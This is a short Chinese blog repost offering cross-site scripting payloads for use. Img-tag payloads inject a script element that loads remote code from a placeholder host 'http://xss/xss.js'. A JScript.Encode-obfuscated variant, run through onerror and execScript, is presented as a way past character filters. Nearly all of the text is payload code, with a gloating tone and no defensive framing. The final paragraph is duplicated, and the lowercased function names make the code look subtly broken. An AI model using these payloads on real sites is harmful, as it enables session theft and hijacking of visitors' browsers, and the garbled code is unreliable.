教你如何在XSS中再插JS
程序员文章站
2022-03-16 16:44:23
<img src="javascript:try{var s=document.createelement('script');s.src='http://xss/xss.js';document.body.appendchild(s);}catch(e){}"></img>
字符过滤怎么办?用encode加密后就无敌了~
未加密前:
<img src='#' xss="try{var s=document.createelement('script');s.src='http://xss/xss.js';document.body.appendchild(s);}catch(e){}" onerror="execscript(decodeuri(this.xss),'jscript.encode');" > 加密后:
<img src='#' xss="#@~^bqaaaa==omx`7lmp/{nk^es uycm.nmy as s xdcv/1dbwobbikrdd1xb4yo2=zzpjuzp?u n/vpnkmes or(w[xcl22xn;4k^n`kbi81ldm4`nbp8xccaaa==^#~@ " onerror="execscript(decodeuri(this.xss),'jscript.encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeuri处理一次encode加密后的代码
<img src='#' xss="try{var s=document.createelement('script');s.src='http://xss/xss.js';document.body.appendchild(s);}catch(e){}" onerror="execscript(decodeuri(this.xss),'jscript.encode');" > 加密后:
<img src='#' xss="#@~^bqaaaa==omx`7lmp/{nk^es uycm.nmy as s xdcv/1dbwobbikrdd1xb4yo2=zzpjuzp?u n/vpnkmes or(w[xcl22xn;4k^n`kbi81ldm4`nbp8xccaaa==^#~@ " onerror="execscript(decodeuri(this.xss),'jscript.encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeuri处理一次encode加密后的代码